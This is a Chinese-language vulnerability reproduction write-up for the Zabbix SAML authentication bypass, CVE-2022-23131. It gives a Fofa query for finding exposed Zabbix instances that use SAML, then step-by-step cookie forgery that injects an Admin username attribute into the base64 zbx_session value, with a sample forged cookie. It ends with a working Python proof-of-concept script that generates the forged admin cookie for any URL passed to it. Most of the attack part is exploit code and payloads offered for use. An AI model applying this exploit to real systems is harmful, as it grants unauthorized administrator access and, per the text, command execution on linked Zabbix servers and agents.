Zabbix登录绕过漏洞复现(CVE-2022-23131)

Zabbix登录绕过漏洞复现(CVE-2022-23131)

漏洞描述

安全断言标记语言 (SAML) 是最常见的单点登录 (SSO) 标准之一。围绕 XML 实现，它允许身份提供者（IdP，一个能够对用户进行身份验证的实体）告诉服务提供者（SP，这里是 Zabbix）你是谁。您可以将Zabbix Web 前端配置为允许通过 SAML 进行用户身份验证，但默认情况下不启用它，因为它需要了解身份提供者的详细信息。这是企业部署最常见的设置。

在启用 SAML SSO 身份验证的实例上，它允许绕过身份验证并获得管理员权限。攻击者可以使用此访问权限在链接的Zabbix Server和Zabbix Agent实例上执行任意命令。

影响版本

Zabbix Web 前端版本包括

• 5.4.8
• 5.0.18
• 4.0.36
• 6.0.0alpha1

漏洞复现

Fofa 语法 app="ZABBIX-监控系统" && body="saml"

点击 Sign in 下面的 Sign in with Single Sign-On (SAML)

使用 Burp 抓包

复制 zbx_session 的值，使用 base64 解密一下

解密出来的数据和 {"saml_data":{"username_attribute":"Admin"} 结合一下

{"saml_data":{"username_attribute":"Admin"},"sessionid":"34deaa6a30e4208c183b335881a90a31","sign":"1YVxmgvUSc88AlgUPD3lsAmd1hAZoy+rRxNktEwqjxxT0NywAeDBjARJugpYGuVqPU8CfGtwkNgknfUstaK5\/Q=="}

然后使用 base64 加密一下

eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiMzRkZWFhNmEzMGU0MjA4YzE4M2IzMzU4ODFhOTBhMzEiLCJzaWduIjoiMVlWeG1ndlVTYzg4QWxnVVBEM2xzQW1kMWhBWm95K3JSeE5rdEV3cWp4eFQwTnl3QWVEQmpBUkp1Z3BZR3VWcVBVOENmR3R3a05na25mVXN0YUs1XC9RPT0ifQ==

然后替换 zbx_session 的值

Python 脚本

Python 脚本代码

# coding

import sys
import requests
import re,base64,urllib.parse,json
# 禁用警告
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def runPoc(url):
    response = requests.get(url,verify=False)

    cookie = response.headers.get("Set-Cookie")

    sessionReg = re.compile("zbx_session=(.*?);")
    try:
        session = re.findall(sessionReg,cookie)[0]

        base64_decode = base64.b64decode(urllib.parse.unquote(session,encoding="utf-8"))
        session_json = json.loads(base64_decode)

        payload = '{"saml_data":{"username_attribute":"Admin"},"sessionid":"%s","sign":"%s"}'%(session_json["sessionid"],session_json["sign"])

        print("未加密Payload：" + payload)
        print('\n')
        payload_encode = urllib.parse.quote(base64.b64encode(payload.encode()))

        print("加密后Payload：" + payload_encode)

    except IndexError:
        print("[-] 不存在漏洞")

if __name__ == '__main__':
    try:
        url = sys.argv[1]
        runPoc(url)
    except IndexError:
        print("""
    Use: python CVE-2022-23131.py http://xxxxxxxxx.com
            
            By:MrHatSec""")

python3 CVE-2022-23131.py url

将生成的加密后的 Payload 替换到当前目标的 Cookie中，即可直接进入管理界面